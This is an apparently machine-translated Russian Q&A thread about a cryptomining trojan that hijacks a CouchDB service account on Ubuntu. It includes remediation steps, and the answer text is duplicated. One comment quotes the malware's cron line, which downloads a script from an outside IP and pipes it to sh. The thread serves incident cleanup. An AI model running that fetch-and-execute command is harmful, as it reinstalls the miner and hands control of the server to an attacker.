Пользователь couchdb с командой vpz
Я запускаю couchdb на моем сервере Ubuntu, но есть процесс, выполняющийся как пользователь couchdb с именем vpz.
Я не знаю, что это такое, но он работает на более 150% CPU.
Я остановил couchdb от запуска. Я убиваю процесс, но примерно через 10 секунд он возвращается.
Кто-нибудь знает, что это такое, или как остановить его от использования большого количества процессоров?
Процесс vpz работает как пользовательский couchdb. Вывод ps -u couchdb ниже:
ps -u couchdb
PID TTY TIME CMD
9267 ? 04:50:06 vpz
10232 ? 00:10:09 beam.smp
10252 ? 00:00:00 sh
10337 ? 00:01:56 couchjs
10391 ? 00:02:52 couchjs
10393 ? 00:00:44 couchjs
10397 ? 00:01:31 couchjs
11013 ? 00:01:51 couchjs
12127 ? 00:00:57 couchjs
19805 ? 00:00:00 sh
19807 ? 00:00:00 sh
19855 ? 00:00:00 sleep
Выход grep couchdb / etc / passwd
grep couchdb /etc/passwd
couchdb:x:110:118:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash
Выход sudo find / -name vpz
sudo find / -name vpz
[sudo] password for admin:
/var/tmp/vpz
2 ответа
Оказывается, это действительно троянец Bitcoin Mining. Каждый раз, когда я удаляю команду, она возвращается через несколько минут. Я сделал для этого несколько поисков и нашел частичное решение. В основном есть задание cron в профиле пользователя couchdb. Первая остановка couchdb
sudo service couchdb stop
Выполните следующие команды, чтобы найти этот crontab и удалить там строку. sudo -i su couchdb crontab -e
Удалите файлы в / var / tmp, а также в / tmp, так как там есть некоторые файлы, которые также принадлежат couchdb.
After что мне нужно обновить мою установку couchdb.
Оказывается, это действительно троянец Bitcoin Mining. Каждый раз, когда я удаляю команду, она возвращается через несколько минут. Я сделал для этого несколько поисков и нашел частичное решение. В основном есть задание cron в профиле пользователя couchdb. Первая остановка couchdb
sudo service couchdb stop
Выполните следующие команды, чтобы найти этот crontab и удалить там строку. sudo -i su couchdb crontab -e
Удалите файлы в / var / tmp, а также в / tmp, так как там есть некоторые файлы, которые также принадлежат couchdb.
After что мне нужно обновить мою установку couchdb.
-
1Я бы рассмотрел формат / переустановку Ubuntu с нуля (после выполнения резервного копирования на все ваши персональные данные) - это должно гарантировать, что у вас не будет скрытых троянских / вирусов в вашей системе – Yaron 31 January 2018 в 13:10
-
2Ты спас мой куддб! В sudo -i su couchdb и crontab -e появился cronjob curl http://94.250.253.178/logo6.jpg|sh, который заставлял /var/tmp/vpz перезагружать однажды убитого. – Peter Gerhat 9 February 2018 в 18:31